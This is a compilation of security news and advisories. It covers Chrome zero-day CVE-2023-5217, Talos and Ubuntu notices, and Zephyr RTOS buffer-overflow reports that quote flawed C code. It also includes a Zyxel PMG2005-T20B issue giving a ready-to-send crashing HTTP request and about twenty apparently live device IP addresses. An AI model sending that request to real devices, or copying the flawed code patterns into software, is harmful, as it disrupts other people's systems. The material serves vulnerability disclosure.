By Waqas
Ensure Your Chrome Browser Is Up to Date and Secure: Enable Automatic Updates to Safeguard Against Cybersecurity Threats
This is a post from HackRead.com Read the original post: Critical Chrome Update Counters Spyware Vendor’s Exploits

The Recent Chrome Update Follows Unveiling of Cytrox’s Predator Spyware Targeting iOS Devices of Egyptian Politician by Google TAG and University of Toronto’s Citizen Lab.

In a swift response to a potentially dangerous cybersecurity threat, Google has released an urgent update for its Chrome web browser. The update, available for Windows, macOS, and Linux users, is aimed at patching a zero-day vulnerability that was reportedly exploited by a commercial spyware vendor.

On Tuesday, Google officially unveiled the stable channel update for Chrome, which brings the browser to version 117.0.5938.132. While this update addresses a total of ten vulnerabilities, three of them are particularly noteworthy, according to the company’s advisory.

The most critical of these vulnerabilities, identified as CVE-2023-5217, has been characterized as a “heap buffer overflow in vp8 encoding in libvpx.” This security flaw was reported to the Chrome development team by Clement Lecigne, a member of Google’s Threat Analysis Group (TAG), just days before the patch’s release.

What makes CVE-2023-5217 particularly concerning is that it has already been exploited in the wild. Although Google’s advisory does not delve into specifics regarding the nature of these attacks, insights from Maddie Stone, a researcher with Google TAG, reveal that the zero-day vulnerability was leveraged by a commercial surveillance vendor.

This revelation comes hot on the heels of an announcement by Google TAG and the University of Toronto’s Citizen Lab group regarding an operation with malicious intentions. The operation aimed to deliver a potent piece of spyware, ominously named “Predator,” to an opposition politician in Egypt.

The analysis of this operation uncovered a disconcerting use of various zero-day vulnerabilities and man-in-the-middle (MitM) attacks. These tactics were deployed to surreptitiously deliver the spyware to both Android and iOS devices, marking a troubling development in the realm of cyber espionage.

The urgency with which Google responded to this zero-day vulnerability underscores the ever-present and evolving nature of online threats. In an age where cybersecurity is paramount, users are reminded once again to remain vigilant, keep their software up to date, and exercise caution when browsing the web.

As technology continues to advance, so do the capabilities of those who seek to exploit it. In the ongoing cat-and-mouse game between cybersecurity experts and threat actors, swift responses like Google’s are essential in safeguarding cyberspace.

****RELATED ARTICLES****

1.  Google reveals spyware attack on Android, iOS, and Chrome
2.  Israeli Spyware Vendor Uses Chrome 0day to Target Journalists
3.  Fake Chrome Browser Update Installs NetSupport Manager RAT

Critical Chrome Update Counters Spyware Vendor’s Exploits

Google on Wednesday rolled out fixes to address a new actively exploited zero-day in the Chrome browser.
Tracked as CVE-2023-5217, the high-severity vulnerability has been described as a heap-based buffer overflow in the VP8 compression format in libvpx, a free software video codec library from Google and the Alliance for Open Media (AOMedia).
Exploitation of such buffer overflow flaws can

Google on Wednesday rolled out fixes to address a new actively exploited zero-day in the Chrome browser.

Tracked as **CVE-2023-5217**, the high-severity vulnerability has been described as a heap-based buffer overflow in the VP8 compression format in libvpx, a free software video codec library from Google and the Alliance for Open Media (AOMedia).

Exploitation of such buffer overflow flaws can result in program crashes or execution of arbitrary code, impacting its availability and integrity.

Clément Lecigne of Google's Threat Analysis Group (TAG) has been credited with discovering and reporting the flaw on September 25, 2023, with fellow researcher Maddie Stone noting on X (formerly Twitter) that it has been abused by a commercial spyware vendor to target high-risk individuals.

No additional details have been disclosed by the tech giant other than to acknowledge that it's "aware that an exploit for CVE-2023-5217 exists in the wild."

The latest discovery brings to five the number of zero-day vulnerabilities to Google Chrome for which patches have been released this year -

*   **CVE-2023-2033** (CVSS score: 8.8) - Type confusion in V8
*   **CVE-2023-2136** (CVSS score: 9.6) - Integer overflow in Skia
*   **CVE-2023-3079** (CVSS score: 8.8) - Type confusion in V8
*   **CVE-2023-4863** (CVSS score: 8.8) - Heap buffer overflow in WebP

The development comes as Google assigned a new CVE identifier, CVE-2023-5129, to the critical flaw in the libwebp image library – originally tracked as CVE-2023-4863 – that has come under active exploitation in the wild, considering its broad attack surface.

Users are recommended to upgrade to Chrome version 117.0.5938.132 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Update Chrome Now: Google Releases Patch for Actively Exploited Zero-Day Vulnerability

Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

**Rumble**

ZYXEL-PMG2005-T20B has a denial of service vulnerability.Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

Zyxel is a leading global provider of comprehensive communication and information solutions, providing innovative technology and product solutions for telecom operators, government and enterprise customers, and consumers worldwide. ZYXEL-PMG2005-T20B has a denial of service vulnerability. Attackers can exploit this vulnerability to cause the browser to crash.

Triggered process：Using a valid SESSIONID of the ZYXEL-PMG2005-T20B product, when the number of admin in the uid reaches 50, backend parsing can cause any web application of the product ZYXEL-PMG2005-T20B to crash.

The following are the details of the vulnerability:  
1.Vulnerability Address：http://177.221.16.243/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 177.221.16.243  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://177.221.16.243/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution  
2.Vulnerability Address：http://179.191.53.240/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 179.191.53.240  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://179.191.53.240/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution  
3.  
Vulnerability Address：http://179.191.53.133/cgi-bin/login.asp

Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 179.191.53.133  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://179.191.53.133/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution

Vulnerability Address：http://177.221.17.76/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 177.221.17.76  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://177.221.17.76/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution

5.Vulnerability Address：http://187.111.205.144/cgi-bin/login.asp  
6.Vulnerability Address：http://179.191.53.138/cgi-bin/login.asp  
7.Vulnerability Address：http://187.111.205.157/cgi-bin/login.asp  
8.Vulnerability Address：http://189.36.156.42/cgi-bin/login.asp  
9.Vulnerability Address：http://179.191.53.15/cgi-bin/login.asp  
10.Vulnerability Address：http://45.182.161.27/cgi-bin/login.asp  
11.Vulnerability Address：http://45.182.161.46/cgi-bin/login.asp  
12.Vulnerability Address：http://45.182.161.42/cgi-bin/login.asp  
13.Vulnerability Address：http://45.182.161.47/cgi-bin/login.asp  
14.Vulnerability Address：http://45.182.161.43/cgi-bin/login.asp  
15.Vulnerability Address：http://45.182.161.25/cgi-bin/login.asp  
16.Vulnerability Address：http://179.191.53.89/cgi-bin/login.asp  
17.Vulnerability Address：http://179.107.195.230/cgi-bin/login.asp  
18.Vulnerability Address：http://45.182.161.41/cgi-bin/login.asp  
19.Vulnerability Address：http://45.182.161.33/cgi-bin/login.asp  
20.Vulnerability Address：http://45.182.161.45/cgi-bin/login.asp

Request package is：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: IP  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://IP/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Replacing the above two IPs with the target IP can cause the browser to crash

The following is a vulnerability replay video:  
https://github.com/Rumble00/Rumble/assets/145107465/c1ad7082-513f-427f-9706-30c75097d586

CVE-2023-43314: ZYXEL-PMG2005-T20B has a denial of service vulnerability · Issue #1 · Rumble00/Rumble

### Impact
Heap buffer overflow in `libwebp` allows a remote attacker to perform an out of bounds memory write via a crafted webp image.

### References
- https://github.com/advisories/GHSA-j7hp-h8jx-5ppr
- https://blog.isosceles.com/the-webp-0day/


**@napi-rs/image affected by libwebp CVE**

High severity GitHub Reviewed Published Sep 27, 2023 in Brooooooklyn/Image • Updated Sep 27, 2023

GHSA-4vjr-crvh-383h: @napi-rs/image affected by libwebp CVE

 Two potential signed to unsigned conversion errors and buffer overflow vulnerabilities at the following locations in the Zephyr IPM drivers.


**Summary**

I spotted two signed to unsigned conversion errors and buffer overflow vulnerabilities at the following locations in the Zephyr IPM driver source code:  
https://github.com/zephyrproject-rtos/zephyr/blob/main/drivers/ipm/ipm\_imx.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/drivers/ipm/ipm\_mcux.c

**Details**

Buffer overflow if size is negative, due to signed/unsigned conversion in /drivers/ipm/ipm\_imx.c:

static int imx\_mu\_ipm\_send(const struct device \*dev, int wait, uint32\_t id,
			   const void \*data, int size)
{
	const struct imx\_mu\_config \*config \= dev\->config;
	MU\_Type \*base \= MU(config);
	uint32\_t data32\[IMX\_IPM\_DATA\_REGS\];
#if !IS\_ENABLED(CONFIG\_IPM\_IMX\_REV2)
	mu\_status\_t status;
#endif
	int i;

	if (id \> CONFIG\_IPM\_IMX\_MAX\_ID\_VAL) {
		return \-EINVAL;
	}

	if (size \> CONFIG\_IPM\_IMX\_MAX\_DATA\_SIZE) { /\* VULN: ineffective check if size is negative \*/
		return \-EMSGSIZE;
	}

	/\* Actual message is passing using 32 bits registers \*/
	memcpy(data32, data, size); /\* VULN: buffer overflow if size is negative \*/
...

Buffer overflow if size is negative, due to signed/unsigned conversion in /drivers/ipm/ipm\_mcux.c:

static int mcux\_mailbox\_ipm\_send(const struct device \*d, int wait,
				 uint32\_t id,
				 const void \*data, int size)
{
	const struct mcux\_mailbox\_config \*config \= d\->config;
	MAILBOX\_Type \*base \= config\->base;
	uint32\_t data32\[MCUX\_IPM\_DATA\_REGS\]; /\* Until we change API
					   \* to uint32\_t array
					   \*/
	unsigned int flags;
	int i;

	ARG\_UNUSED(wait);

	if (id \> MCUX\_IPM\_MAX\_ID\_VAL) {
		return \-EINVAL;
	}

	if (size \> MCUX\_IPM\_DATA\_REGS \* sizeof(uint32\_t)) { /\* VULN: ineffective check if size is negative \*/
		return \-EMSGSIZE;
	}

	flags \= irq\_lock();

	/\* Actual message is passing using 32 bits registers \*/
	memcpy(data32, data, size); /\* VULN: buffer overflow if size is negative \*/
...

**PoC**

I haven't tried to reproduce these potential vulnerabilities against a live install of the Zephyr OS.

**Impact**

If the inputs above are attacker-controlled and cross a security boundary, the impact of the unsigned conversion errors and buffer overflow vulnerabilities could range from denial of service to arbitrary code execution.

CVE-2023-5184: Signed to unsigned conversion errors and buffer overflow vulnerabilities in the Zephyr IPM driver

Talos disclosed 10 vulnerabilities over the past two weeks affecting a range of software, including the popular Google Chrome web browser.

Wednesday, September 27, 2023 12:09

Cisco Talos disclosed 10 vulnerabilities over the past two weeks affecting a range of software, including the popular Google Chrome web browser.

Attackers could exploit these vulnerabilities to carry out a variety of attacks, in some cases gaining the ability to execute remote code on the targeted machine.

Four of the vulnerabilities included in today’s Vulnerability Roundup that affect the Accusoft ImageGear development toolkit have a CVSS severity score of 9.8 out of a possible 10.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

**Use-after-free vulnerability in Google Chrome web browser**

TALOS-2023-1751 (CVE-2023-3421) is a use-after-free vulnerability that affects the Google Chrome web browser. An attacker could exploit this vulnerability by tricking the target into visiting a specially crafted HTML web page.

The vulnerability arises when an adversary manipulates a specific function in Chrome to cause an out-of-bounds heap memory access, which could lead to a heap use-after-free or heap overflow.

**Multiple vulnerabilities in Accusoft ImageGear**

Talos researchers recently discovered eight vulnerabilities in Accusoft ImageGear, a document-imaging developer toolkit that allows users to convert, edit and create images.

Three of the vulnerabilities — TALOS-2023-1802 (CVE-2023-32653), TALOS-2023-1830 (CVE-2023-39453) and TALOS-2023-1760 (CVE-2023-35002) are heap-based buffer overflow vulnerabilities that could allow an attacker to execute arbitrary code on the targeted machine. Another issue, TALOS-2023-1836 (CVE-2023-40163), also has a critical severity score of 9.8 out of 10, but in this case, a specially crafted file could lead to memory corruption.

TALOS-2023-1729 (CVE-2023-23567) can also lead to arbitrary code execution, though this vulnerability is considered less severe. An attacker could also exploit this vulnerability by supplying the target with a malformed file.

There are three other vulnerabilities Talos discovered in this software that could cause a heap-based buffer overflow condition or memory corruption if the attacker sends a specially crafted file to the target.

*   TALOS-2023-1750 (CVE-2023-32284)
*   TALOS-2023-1742 (CVE-2023-28393)
*   TALOS-2023-1749 (CVE-2023-32614)

Hancom Office is one of the most popular software packages in South Korea, offering word processing and other services similar to Microsoft Office 365.

Talos discovered a use-after-free vulnerability in HWord, the package’s word processing software. TALOS-2023-1759 (CVE-2023-32541) can be manipulated in a way that will eventually allow the attacker to execute arbitrary code if they trick the target into opening a specially crafted, malicious .doc file.

10 new vulnerabilities disclosed by Talos, including use-after-free issue in Google Chrome

Ubuntu Security Notice 6398-1 - It was discovered that ReadyMedia was vulnerable to DNS rebinding attacks. A remote attacker could possibly use this issue to trick the local DLNA server to leak information. This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. It was discovered that ReadyMedia incorrectly handled certain HTTP requests using chunked transport encoding. A remote attacker could possibly use this issue to cause buffer overflows, resulting in out-of-bounds reads and writes.

==========================================================================  
Ubuntu Security Notice USN-6398-1  
September 27, 2023

minidlna vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in ReadyMedia.

Software Description:  
- minidlna: lightweight DLNA/UPnP-AV server targeted at embedded systems

Details:

It was discovered that ReadyMedia was vulnerable to DNS rebinding attacks.  
A remote attacker could possibly use this issue to trick the local DLNA  
server to leak information. This issue only affected Ubuntu 16.04 LTS,  
Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-26505)

It was discovered that ReadyMedia incorrectly handled certain HTTP requests  
using chunked transport encoding. A remote attacker could possibly use this  
issue to cause buffer overflows, resulting in out-of-bounds reads and writes.  
(CVE-2023-33476)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   minidlna                        1.3.0+dfsg-2.2ubuntu0.1

Ubuntu 22.04 LTS:  
   minidlna                        1.3.0+dfsg-2.1ubuntu0.1

Ubuntu 20.04 LTS:  
   minidlna                        1.2.1+dfsg-1ubuntu0.20.04.2

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   minidlna                        1.2.1+dfsg-1ubuntu0.18.04.1+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   minidlna                        1.1.5+dfsg-2ubuntu0.1+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6398-1  
   CVE-2022-26505, CVE-2023-33476

Package Information:  
   https://launchpad.net/ubuntu/+source/minidlna/1.3.0+dfsg-2.2ubuntu0.1  
   https://launchpad.net/ubuntu/+source/minidlna/1.3.0+dfsg-2.1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/minidlna/1.2.1+dfsg-1ubuntu0.20.04.2

Ubuntu Security Notice USN-6398-1

Potential off-by-one buffer overflow vulnerability in the Zephyr fuse file system.




**Summary**

I spotted an off-by-one buffer overflow vulnerability at the following location in the Zephyr FS subsystem source code:  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/fs/fuse\_fs\_access.c

**Details**

If the string passed to the following function via the path parameter is PATH\_MAX chars long (including the NUL terminator), the insecure sprintf() function call marked below writes one NUL byte off the stack variable mount_path:

static int fuse\_fs\_access\_readdir(const char \*path, void \*buf,
			      fuse\_fill\_dir\_t filler, off\_t off,
			      struct fuse\_file\_info \*fi)
{
	struct fs\_dir\_t dir;
	struct fs\_dirent entry;
	int err;
	struct stat stat;

	ARG\_UNUSED(off);
	ARG\_UNUSED(fi);

	if (strcmp(path, "/") \== 0) {
		return fuse\_fs\_access\_readmount(buf, filler);
	}

	fs\_dir\_t\_init(&dir);

	if (is\_mount\_point(path)) {
		/\* File system API expects trailing slash for a mount point
		 \* directory but FUSE strips the trailing slashes from
		 \* directory names so add it back.
		 \*/
		char mount\_path\[PATH\_MAX\];

		sprintf(mount\_path, "%s/", path); /\* VULN \*/
		err \= fs\_opendir(&dir, mount\_path);
	} else {
		err \= fs\_opendir(&dir, path);
	}
...

**PoC**

I haven't tried to reproduce this potential vulnerability against a live install of the Zephyr OS.

**Impact**

If the unchecked input above is attacker-controlled and crosses a security boundary, depending on stack layout, the off-by-one buffer overflow vulnerability could be exploited to cause a denial of service or even achieve arbitrary code execution.

CVE-2023-4260: Off-by-one buffer overflow vulnerability in the Zephyr FS subsystem

Potential buffer overflow vulnerabilities n the Zephyr Bluetooth subsystem.




**Summary**

I spotted a few buffer overflow vulnerabilities at the following locations in the Zephyr Bluetooth subsystem source code:  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/audio/tbs.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/audio/shell/mcc.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/audio/shell/media\_controller.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/host/conn.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/mesh/beacon.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/mesh/prov\_device.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/mesh/provisioner.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/mesh/shell/rpr.c

**Details**

Static buffer overflows in /subsys/bluetooth/audio/tbs.c:

int bt\_tbs\_remote\_incoming(uint8\_t bearer\_index, const char \*to,
			   const char \*from, const char \*friendly\_name)
{
	struct tbs\_service\_inst \*inst;
	struct bt\_tbs\_call \*call \= NULL;
	size\_t local\_uri\_ind\_len;
	size\_t remote\_uri\_ind\_len;
	size\_t friend\_name\_ind\_len;
...
	inst \= &svc\_insts\[bearer\_index\];
...
	if (friendly\_name) {
		inst\->friendly\_name.call\_index \= call\->index;
		(void)strcpy(inst\->friendly\_name.uri, friendly\_name); /\* VULN \*/
		friend\_name\_ind\_len \= strlen(from) + 1;
...
	if (IS\_ENABLED(CONFIG\_BT\_GTBS)) {
...
		if (friendly\_name) {
			gtbs\_inst.friendly\_name.call\_index \= call\->index;
			(void)strcpy(gtbs\_inst.friendly\_name.uri, friendly\_name); /\* VULN \*/
			friend\_name\_ind\_len \= strlen(from) + 1;
...

Stack-based buffer overflow in /subsys/bluetooth/audio/shell/mcc.c:

#ifdef CONFIG\_BT\_MCC\_OTS
static int cmd\_mcc\_send\_search\_raw(const struct shell \*sh, size\_t argc,
				   char \*argv\[\])
{
	int result;
	struct mpl\_search search;

	search.len \= strlen(argv\[1\]);
	memcpy(search.search, argv\[1\], search.len); /\* VULN \*/
	LOG\_DBG("Search string: %s", argv\[1\]);

	result \= bt\_mcc\_send\_search(default\_conn, &search);
	if (result) {
		shell\_print(sh, "Fail: %d", result);
	}
	return result;
}

Stack-based buffer overflow in /subsys/bluetooth/audio/shell/media\_controller.c:

#ifdef CONFIG\_BT\_OTS
static int cmd\_media\_set\_search(const struct shell \*sh, size\_t argc, char \*argv\[\])
{
	/\* TODO: Currently takes the raw search as input - add parameters
	 \* and build the search item here
	 \*/

	struct mpl\_search search;
	int err;

	search.len \= strlen(argv\[1\]);
	memcpy(search.search, argv\[1\], search.len); /\* VULN \*/
	LOG\_DBG("Search string: %s", argv\[1\]);

	err \= media\_proxy\_ctrl\_send\_search(current\_player, &search);
	if (err) {
		shell\_error(ctx\_shell, "Search send failed (%d)", err);
	}

	return err;
}

Heap-based buffer overflow in /subsys/bluetooth/host/conn.c:

#if defined(CONFIG\_BT\_SMP)
...
int bt\_conn\_le\_start\_encryption(struct bt\_conn \*conn, uint8\_t rand\[8\],
				uint8\_t ediv\[2\], const uint8\_t \*ltk, size\_t len)
{
	struct bt\_hci\_cp\_le\_start\_encryption \*cp;
	struct net\_buf \*buf;

	buf \= bt\_hci\_cmd\_create(BT\_HCI\_OP\_LE\_START\_ENCRYPTION, sizeof(\*cp));
	if (!buf) {
		return \-ENOBUFS;
	}

	cp \= net\_buf\_add(buf, sizeof(\*cp));
	cp\->handle \= sys\_cpu\_to\_le16(conn\->handle);
	memcpy(&cp\->rand, rand, sizeof(cp\->rand));
	memcpy(&cp\->ediv, ediv, sizeof(cp\->ediv));

	memcpy(cp\->ltk, ltk, len); /\* VULN \*/
	if (len < sizeof(cp\->ltk)) {
		(void)memset(cp\->ltk + len, 0, sizeof(cp\->ltk) \- len);
	}

	return bt\_hci\_cmd\_send\_sync(BT\_HCI\_OP\_LE\_START\_ENCRYPTION, buf, NULL);
}

Ineffective size check due to assert and buffer overflow in /subsys/bluetooth/mesh/beacon.c:

void bt\_mesh\_beacon\_priv\_random\_get(uint8\_t \*random, size\_t size)
{
	\_\_ASSERT(size <= sizeof(priv\_random.val), "Invalid random value size %u", size);
	memcpy(random, priv\_random.val, size); /\* VULN \*/
}

Static buffer overflow in /subsys/bluetooth/mesh/prov\_device.c (conf\_size could be 32 and not 16):

static void prov\_confirm(const uint8\_t \*data)
{
	uint8\_t conf\_size \= bt\_mesh\_prov\_auth\_size\_get();

	LOG\_DBG("Remote Confirm: %s", bt\_hex(data, conf\_size));

	memcpy(bt\_mesh\_prov\_link.conf, data, conf\_size); /\* VULN \*/
	notify\_input\_complete();

	send\_confirm();
}

Static buffer overflow in /subsys/bluetooth/mesh/provisioner.c (conf\_size could be 32 and not 16):

static void prov\_confirm(const uint8\_t \*data)
{
	uint8\_t conf\_size \= bt\_mesh\_prov\_auth\_size\_get();

	LOG\_DBG("Remote Confirm: %s", bt\_hex(data, conf\_size));

	if (!memcmp(data, bt\_mesh\_prov\_link.conf, conf\_size)) {
		LOG\_ERR("Confirm value is identical to ours, rejecting.");
		prov\_fail(PROV\_ERR\_CFM\_FAILED);
		return;
	}

	memcpy(bt\_mesh\_prov\_link.conf, data, conf\_size); /\* VULN \*/

	send\_random();
}

Stack-based buffer overflow in /subsys/bluetooth/mesh/shell/rpr.c:

static void rpr\_scan\_report(struct bt\_mesh\_rpr\_cli \*cli,
			    const struct bt\_mesh\_rpr\_node \*srv,
			    struct bt\_mesh\_rpr\_unprov \*unprov,
			    struct net\_buf\_simple \*adv\_data)
{
	char uuid\_hex\_str\[32 + 1\];

	bin2hex(unprov\->uuid, 16, uuid\_hex\_str, sizeof(uuid\_hex\_str));

	shell\_print(bt\_mesh\_shell\_ctx\_shell,
		    "Server 0x%04x:\\n"
		    "\\tuuid:   %s\\n"
		    "\\tOOB:    0x%04x",
		    srv\->addr, uuid\_hex\_str, unprov\->oob);

	while (adv\_data && adv\_data\->len \> 2) {
		uint8\_t len, type;
		uint8\_t data\[31\];

		len \= net\_buf\_simple\_pull\_u8(adv\_data) \- 1;
		type \= net\_buf\_simple\_pull\_u8(adv\_data);
		memcpy(data, net\_buf\_simple\_pull\_mem(adv\_data, len), len); /\* VULN \*/
		data\[len\] \= '\\0';

		if (type \== BT\_DATA\_URI) {
			shell\_print(bt\_mesh\_shell\_ctx\_shell, "\\tURI:    \\"\\\\x%02x%s\\"",
				    data\[0\], &data\[1\]);
		} else if (type \== BT\_DATA\_NAME\_COMPLETE) {
			shell\_print(bt\_mesh\_shell\_ctx\_shell, "\\tName:   \\"%s\\"", data);
		} else {
			char string\[64 + 1\];

			bin2hex(data, len, string, sizeof(string));
			shell\_print(bt\_mesh\_shell\_ctx\_shell, "\\t0x%02x:  %s", type, string);
		}
	}
}

**PoC**

I haven't tried to reproduce these potential vulnerabilities against a live install of the Zephyr OS.

**Impact**

If the unchecked inputs above are attacker-controlled and cross a security boundary, the impact of the buffer overflow vulnerabilities could range from denial of service to arbitrary code execution.

**Patches**

This has been fixed in:

*   main: #60465

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in zephyr
*   Email us at Zephyr-vulnerabilities

embargo: 2023-08-19

CVE-2023-4264: Buffer overflow vulnerabilities in the Zephyr Bluetooth subsystem

Possible buffer overflow  in Zephyr mgmt subsystem when asserts are disabled



**Summary**

I spotted a few buffer overflow vulnerabilities at the following locations in the Zephyr Mgmt subsystem source code:  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/mgmt/mcumgr/transport/src/smp.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/mgmt/osdp/src/osdp\_cp.c

**Details**

Buffer overflow in /subsys/mgmt/mcumgr/transport/src/smp.c:

void \*smp\_alloc\_rsp(const void \*req, void \*arg)
{
	const struct net\_buf \*req\_nb;
	struct net\_buf \*rsp\_nb;
	struct smp\_transport \*smpt \= arg;

	req\_nb \= req;

	rsp\_nb \= smp\_packet\_alloc();
	if (rsp\_nb \== NULL) {
		return NULL;
	}

	if (smpt\->functions.ud\_copy) {
		smpt\->functions.ud\_copy(rsp\_nb, req\_nb);
	} else {
		memcpy(net\_buf\_user\_data(rsp\_nb),
		       net\_buf\_user\_data((void \*)req\_nb),
		       req\_nb\->user\_data\_size); /\* VULN \*/
	}

	return rsp\_nb;
}

Buffer overflow due to assert in /subsys/mgmt/osdp/src/osdp\_cp.c:

static int cp\_build\_command(struct osdp\_pd \*pd, uint8\_t \*buf, int max\_len)
{
	struct osdp\_cmd \*cmd \= NULL;
	int len \= 0;
	int data\_off \= osdp\_phy\_packet\_get\_data\_offset(pd, buf);
#ifdef CONFIG\_OSDP\_SC\_ENABLED
	uint8\_t \*smb \= osdp\_phy\_packet\_get\_smb(pd, buf);
#endif

	buf += data\_off;
	max\_len \-= data\_off;
	if (max\_len <= 0) {
		return OSDP\_CP\_ERR\_GENERIC;
	}

	switch (pd\->cmd\_id) {
...
	case CMD\_TEXT:
		cmd \= (struct osdp\_cmd \*)pd\->ephemeral\_data;
		assert\_buf\_len(CMD\_TEXT\_LEN + cmd\->text.length, max\_len); /\* VULN: assert \*/
		buf\[len++\] \= pd\->cmd\_id;
		buf\[len++\] \= cmd\->text.reader;
		buf\[len++\] \= cmd\->text.control\_code;
		buf\[len++\] \= cmd\->text.temp\_time;
		buf\[len++\] \= cmd\->text.offset\_row;
		buf\[len++\] \= cmd\->text.offset\_col;
		buf\[len++\] \= cmd\->text.length;
		memcpy(buf + len, cmd\->text.data, cmd\->text.length); /\* VULN: buffer overflow \*/
		len += cmd\->text.length;
		break;

